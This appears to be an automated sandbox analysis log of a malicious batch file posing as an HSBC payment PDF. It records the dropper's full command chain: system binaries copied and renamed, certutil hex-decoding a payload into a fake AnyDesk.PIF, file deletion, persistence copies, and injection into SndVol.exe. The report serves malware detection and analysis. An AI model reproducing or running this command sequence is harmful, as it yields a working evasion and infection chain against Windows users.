              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E9FB54 memset,GetDiskFreeSpaceExW,??_V@YAXPEAX@Z,4_2_00007FF6A0E9FB54
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC48F80 VariantInit,#357,#358,#359,CoCreateInstance,VariantClear,#357,VariantClear,SysFreeString,7_2_00007FF68FC48F80
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCC6320 FindResourceW,GetLastError,#357,LoadResource,GetLastError,LockResource,GetLastError,7_2_00007FF68FCC6320
              Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8028:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7904:120:WilError_03
              Source: C:\Windows\SysWOW64\SndVol.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-H5EBMC
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7504:120:WilError_03
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\USD470900_COPY_800BLHSBC882001.PDF.bat" "
              Source: C:\Users\Public\Libraries\AnyDesk.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\Public\Libraries\Faogvkgh.PIF | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\System32\extrac32.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: USD470900_COPY_800BLHSBC882001.PDF.bat | ReversingLabs: Detection: 18%
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\USD470900_COPY_800BLHSBC882001.PDF.bat" "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\USD470900_COPY_800BLHSBC882001.PDF.bat" "C:\\Users\\Public\\AnyDesk.jpeg" 9
Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\USD470900_COPY_800BLHSBC882001.PDF.bat" "C:\\Users\\Public\\AnyDesk.jpeg" 9
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\Libraries\AnyDesk.PIF C:\Users\Public\Libraries\AnyDesk.PIF
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\hgkvgoaF.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\Public\Libraries\AnyDesk.PIF /d C:\\Users\\Public\\Libraries\\Faogvkgh.PIF /o
Source: C:\Windows\SysWOW64\esentutl.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
Source: unknown | Process created: C:\Users\Public\Libraries\Faogvkgh.PIF "C:\Users\Public\Libraries\Faogvkgh.PIF"
Source: C:\Users\Public\Libraries\Faogvkgh.PIF | Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
Source: unknown | Process created: C:\Users\Public\Libraries\Faogvkgh.PIF "C:\Users\Public\Libraries\Faogvkgh.PIF"
Source: C:\Users\Public\Libraries\Faogvkgh.PIF | Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: cabinet.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: textinputframework.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: textshaping.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: cabinet.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: textinputframework.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: textshaping.dll
Source: C:\Users\Public\kn.exe | Section loaded: certcli.dll
Source: C:\Users\Public\kn.exe | Section loaded: cabinet.dll
Source: C:\Users\Public\kn.exe | Section loaded: cryptui.dll
Source: C:\Users\Public\kn.exe | Section loaded: ncrypt.dll
Source: C:\Users\Public\kn.exe | Section loaded: netapi32.dll
Source: C:\Users\Public\kn.exe | Section loaded: ntdsapi.dll
Source: C:\Users\Public\kn.exe | Section loaded: version.dll
Source: C:\Users\Public\kn.exe | Section loaded: secur32.dll
Source: C:\Users\Public\kn.exe | Section loaded: certca.dll
Source: C:\Users\Public\kn.exe | Section loaded: cryptsp.dll
Source: C:\Users\Public\kn.exe | Section loaded: samcli.dll
Source: C:\Users\Public\kn.exe | Section loaded: logoncli.dll
Source: C:\Users\Public\kn.exe | Section loaded: dsrole.dll
Source: C:\Users\Public\kn.exe | Section loaded: netutils.dll
Source: C:\Users\Public\kn.exe | Section loaded: sspicli.dll
Source: C:\Users\Public\kn.exe | Section loaded: ntasn1.dll
Source: C:\Users\Public\kn.exe | Section loaded: uxtheme.dll
Source: C:\Users\Public\kn.exe | Section loaded: profapi.dll
Source: C:\Users\Public\kn.exe | Section loaded: certcli.dll
Source: C:\Users\Public\kn.exe | Section loaded: cabinet.dll
Source: C:\Users\Public\kn.exe | Section loaded: cryptui.dll
Source: C:\Users\Public\kn.exe | Section loaded: ncrypt.dll
Source: C:\Users\Public\kn.exe | Section loaded: netapi32.dll
Source: C:\Users\Public\kn.exe | Section loaded: ntdsapi.dll
Source: C:\Users\Public\kn.exe | Section loaded: certca.dll
Source: C:\Users\Public\kn.exe | Section loaded: version.dll
Source: C:\Users\Public\kn.exe | Section loaded: secur32.dll
Source: C:\Users\Public\kn.exe | Section loaded: cryptsp.dll
Source: C:\Users\Public\kn.exe | Section loaded: samcli.dll
Source: C:\Users\Public\kn.exe | Section loaded: logoncli.dll
Source: C:\Users\Public\kn.exe | Section loaded: dsrole.dll
Source: C:\Users\Public\kn.exe | Section loaded: netutils.dll
Source: C:\Users\Public\kn.exe | Section loaded: sspicli.dll
Source: C:\Users\Public\kn.exe | Section loaded: ntasn1.dll
Source: C:\Users\Public\kn.exe | Section loaded: uxtheme.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: apphelp.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: version.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: uxtheme.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: url.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: ieframe.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: iertutil.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: netapi32.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: userenv.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: winhttp.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: wkscli.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: netutils.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: ??.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: ???????.dll
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: Window Recorder  Window detected: More than 3 window changes detected
Source: USD470900_COPY_800BLHSBC882001.PDF.bat  Static file information: File size 3383372 > 1048576
              Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdb source: AnyDesk.PIF, AnyDesk.PIF, 0000000A.00000003.1426879864.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1517170522.0000000020A8D000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1427511863.000000007F920000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1498326441.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1517170522.0000000020A5D000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1495264734.0000000002286000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000004.00000000.1398569202.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1403371619.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.1422354773.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.1415961649.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1424821170.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1423749785.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000002.1429459275.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000000.1425860533.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, esentutl.exe, 00000010.00000003.1478304743.0000000005320000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.16.dr, alpha.exe.3.dr
              Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000011.00000003.1483371503.0000000005120000.00000004.00001000.00020000.00000000.sdmp, xpha.pif.17.dr
              Source: Binary string: certutil.pdb source: kn.exe, 00000007.00000000.1403779482.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1413735928.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1416809661.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1421176999.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr
              Source: Binary string: easinvoker.pdbH source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: cmd.pdb source: alpha.exe, 00000004.00000000.1398569202.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1403371619.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.1422354773.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.1415961649.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1424821170.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1423749785.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000002.1429459275.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000000.1425860533.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, esentutl.exe, 00000010.00000003.1478304743.0000000005320000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.16.dr, alpha.exe.3.dr
              Source: Binary string: easinvoker.pdbGCTL source: AnyDesk.PIF, 0000000A.00000003.1426879864.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1517170522.0000000020A8D000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1497237334.0000000002AF2000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1427511863.000000007F920000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1498326441.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1517170522.0000000020A5D000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1427109635.0000000002AF6000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1481965290.0000000021982000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1481965290.00000000219B1000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1495264734.0000000002286000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ping.pdb source: esentutl.exe, 00000011.00000003.1483371503.0000000005120000.00000004.00001000.00020000.00000000.sdmp, xpha.pif.17.dr
              Source: Binary string: certutil.pdbGCTL source: kn.exe, 00000007.00000000.1403779482.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1413735928.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1416809661.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1421176999.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr

              Data Obfuscation

              Source: Yara match, File source: 10.2.AnyDesk.PIF.2d30000.2.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 0000000A.00000003.1426879864.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 0000000A.00000003.1427511863.000000007F920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
